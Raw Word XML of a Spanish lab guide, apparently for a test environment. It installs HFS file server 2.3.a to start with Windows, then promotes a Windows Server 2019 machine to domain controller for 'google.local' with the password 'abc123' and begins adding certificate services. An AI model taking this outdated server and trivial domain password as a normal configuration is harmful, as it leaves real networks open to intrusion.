                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Y ahora las listaré:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="183872E3" w14:textId="77777777" w:rsidR="00B97985" w:rsidRDefault="00B97985" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="28F16AAC" w14:textId="17EA950F" w:rsidR="00B97985" w:rsidRDefault="00B97985" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D6525E9" wp14:editId="4C6C1DBB">
                  <wp:extent cx="5400040" cy="5400040"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1047496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6230" name=""/>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1EB24E7" w14:textId="77777777" w:rsidR="00346FF9" w:rsidRDefault="00346FF9" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="73E8624D" w14:textId="2C309708" w:rsidR="00346FF9" w:rsidRDefault="00346FF9" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Pro último instalaré el hfs file server 2.3.a:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31153838" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="119F21AD" w14:textId="269EE9A6" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Primnero estraeremso el archivo zip y después ejecutaremso el servidor:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C32CB5E" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7861BDAE" w14:textId="40D42E66" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2704E3E9" wp14:editId="01A827DB">
                  <wp:extent cx="5400040" cy="5394325"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2090143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3660" name=""/>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5400040" cy="5394325"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="42F03612" w14:textId="77777777" w:rsidR="00346FF9" w:rsidRDefault="00346FF9" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6C7ADA02" w14:textId="77777777" w:rsidR="00346FF9" w:rsidRDefault="00346FF9" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="68DD59DF" w14:textId="77777777" w:rsidR="00346FF9" w:rsidRDefault="00346FF9" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="023A9EDC" w14:textId="3A3F4C76" w:rsidR="00346FF9" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29650CCE" wp14:editId="24A90EAF">
                  <wp:extent cx="5400040" cy="5394325"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="362515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15977"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5400040" cy="5394325"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BE39AAB" w14:textId="77777777" w:rsidR="00346FF9" w:rsidRDefault="00346FF9" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="68CC8C3B" w14:textId="77777777" w:rsidR="00346FF9" w:rsidRDefault="00346FF9" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6F928A48" w14:textId="2D508B46" w:rsidR="00346FF9" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Y marcaremos esta opción, para que se inicie al arrancar Windows:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24F6D92D" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="336F412E" w14:textId="77777777" w:rsidR="005F24F0" w:rsidRDefault="005F24F0" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="64569C0E" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="462C6AF5" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="50D23897" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="29D21C41" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="22AF29DA" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5ED43BF1" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6C55FE41" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5C656A43" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D26B5F4" w14:textId="0784150B" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7127F047" wp14:editId="2439D738">
                  <wp:extent cx="5400040" cy="5394325"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2001584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84819"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5400040" cy="5394325"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1643A34B" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0BD22902" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="626E4092" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="10B347D0" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6F00EAE5" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6BD4BB1F" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C46891D" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="29CEA0C0" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="620D6581" w14:textId="77777777" w:rsidR="002F25AF" w:rsidRDefault="002F25AF" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="49F82D36" w14:textId="7709C287" w:rsidR="00FA352B" w:rsidRPr="00FA352B" w:rsidRDefault="00FA352B" w:rsidP="00FA352B"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00880ADC" w14:paraId="43BADC4B" w14:textId="77777777" w:rsidTr="00994D80">
        <w:trPr>
          <w:trHeight w:val="3546"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10426" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F4DF171" w14:textId="2F979331" w:rsidR="00880ADC" w:rsidRDefault="00FE6023" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="7" w:name="_Toc135575964"/>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Configuracion Windows server 2019:</w:t>
            </w:r>
            <w:bookmarkEnd w:id="7"/>
          </w:p>
          <w:p w14:paraId="39831A8B" w14:textId="77777777" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023"/>
          <w:p w14:paraId="61F56934" w14:textId="77777777" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Lo primero que haré será configurar esta máquina como controlador de dominio:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75622C7E" w14:textId="77777777" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4895B8C6" w14:textId="77777777" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Primero iremos a Administrar -&gt; Agregar roles y características:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A440346" w14:textId="77777777" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1F28BF71" w14:textId="77777777" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00B537D7" wp14:editId="432BF08C">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="124209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9397" name=""/>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6A368397" w14:textId="77777777" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="304B178B" w14:textId="495003B4" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Le daremos a siguiente hasta esta pantalla, en donde marcaremos </w:t>
            </w:r>
            <w:r w:rsidR="00E25D51">
              <w:t>servicio</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> de dominio de Active Directory:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DFC17E9" w14:textId="77777777" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0232F877" w14:textId="302A7592" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67ED2A6B" wp14:editId="1081368C">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="1099948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8097" name=""/>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1777483E" w14:textId="77777777" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5E0D5E2C" w14:textId="27BD7F0B" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Y siguiente.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71AE7F39" w14:textId="77777777" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78583703" w14:textId="5E6210F2" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Y por último por esta instalación de la daremos a instalar:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="397C5B80" w14:textId="77777777" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="09DCA307" w14:textId="1B685572" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CA2BB50" wp14:editId="59F8B36E">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="1846192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2889" name=""/>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5DCFF060" w14:textId="77777777" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B374BEF" w14:textId="4706A468" w:rsidR="00FE6023" w:rsidRDefault="00FE6023" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Una vez acabado la instalación tendremos que configurar Active Directory:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="35F86885" w14:textId="4CEF6287" w:rsidR="00FE6023" w:rsidRDefault="00FD1261" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16A3C3F1" wp14:editId="23A0A16F">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="1282225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5911" name=""/>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2A9C6450" w14:textId="77777777" w:rsidR="00FD1261" w:rsidRDefault="00FD1261" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1F74956F" w14:textId="77777777" w:rsidR="00FD1261" w:rsidRDefault="00FD1261" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3EF5A867" w14:textId="26546E55" w:rsidR="00FD1261" w:rsidRDefault="00FD1261" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Ahora agregaremos un nuevo bosque:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C4FC203" w14:textId="77777777" w:rsidR="00FD1261" w:rsidRDefault="00FD1261" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="620F96AD" w14:textId="34D3B555" w:rsidR="00FD1261" w:rsidRDefault="00FD1261" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38E05D90" wp14:editId="1272356E">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="1833234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34220" name=""/>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14D7205D" w14:textId="77777777" w:rsidR="00FD1261" w:rsidRDefault="00FD1261" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="153475D4" w14:textId="3583E1C7" w:rsidR="00FD1261" w:rsidRDefault="00FD1261" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Y ahora siguiente, hasta esta pantalla:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15B56051" w14:textId="77777777" w:rsidR="00563E1B" w:rsidRDefault="00563E1B" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="399D06EC" w14:textId="1AEC40A9" w:rsidR="00563E1B" w:rsidRDefault="00563E1B" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74795E8B" wp14:editId="6F2D01D0">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="583720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0942" name=""/>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4306D70C" w14:textId="77777777" w:rsidR="00563E1B" w:rsidRDefault="00563E1B" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3E012D48" w14:textId="7EBD5A24" w:rsidR="00563E1B" w:rsidRDefault="00563E1B" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>En la que daremos en instalar, con esto esta máquina estará promocionada a controlador de dominio para el dominio google.local.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72577F06" w14:textId="77777777" w:rsidR="00FD1261" w:rsidRDefault="00FD1261" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4CA177DF" w14:textId="552C1D0D" w:rsidR="00FD1261" w:rsidRDefault="00FD1261" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Con contraseña abc123. :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35776B41" w14:textId="77777777" w:rsidR="00FD1261" w:rsidRDefault="00FD1261" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="43D010B9" w14:textId="311DE3F3" w:rsidR="00FD1261" w:rsidRDefault="00FD1261" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62BEA34A" wp14:editId="468B28B2">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="701158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8860" name=""/>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392C5EFD" w14:textId="77777777" w:rsidR="00797482" w:rsidRDefault="00797482" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4D97331C" w14:textId="2896B238" w:rsidR="00797482" w:rsidRDefault="00797482" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Ahora vamos a configurar una entidad emisora de certificados:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06876714" w14:textId="77777777" w:rsidR="00797482" w:rsidRDefault="00797482" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3430D8DF" w14:textId="3398CC57" w:rsidR="00797482" w:rsidRDefault="000F6118" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Primero iremos a agregar roles y características:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FBD388C" w14:textId="77777777" w:rsidR="000F6118" w:rsidRDefault="000F6118" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1D04F7CF" w14:textId="7D3F44B2" w:rsidR="00563E1B" w:rsidRDefault="000F6118" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F3B6B5A" wp14:editId="2592644B">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="1285675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75996" name=""/>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4DBF8F8A" w14:textId="77777777" w:rsidR="000F6118" w:rsidRDefault="000F6118" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57E5FC4A" w14:textId="11667B66" w:rsidR="000F6118" w:rsidRDefault="000F6118" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Instalación basada en características y en roles:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31E83E5D" w14:textId="77777777" w:rsidR="000F6118" w:rsidRDefault="000F6118" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="55F111FE" w14:textId="27AD6D52" w:rsidR="000F6118" w:rsidRDefault="000F6118" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4347AE2B" wp14:editId="2FF1771F">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="637906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06299" name=""/>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7B21D0F3" w14:textId="77777777" w:rsidR="000F6118" w:rsidRDefault="000F6118" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="774FC8BF" w14:textId="464B88A8" w:rsidR="000F6118" w:rsidRDefault="000F6118" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Y elegimos servicios de certificado e Active Directory:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C4C5AFB" w14:textId="77777777" w:rsidR="000F6118" w:rsidRDefault="000F6118" w:rsidP="00FE6023">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
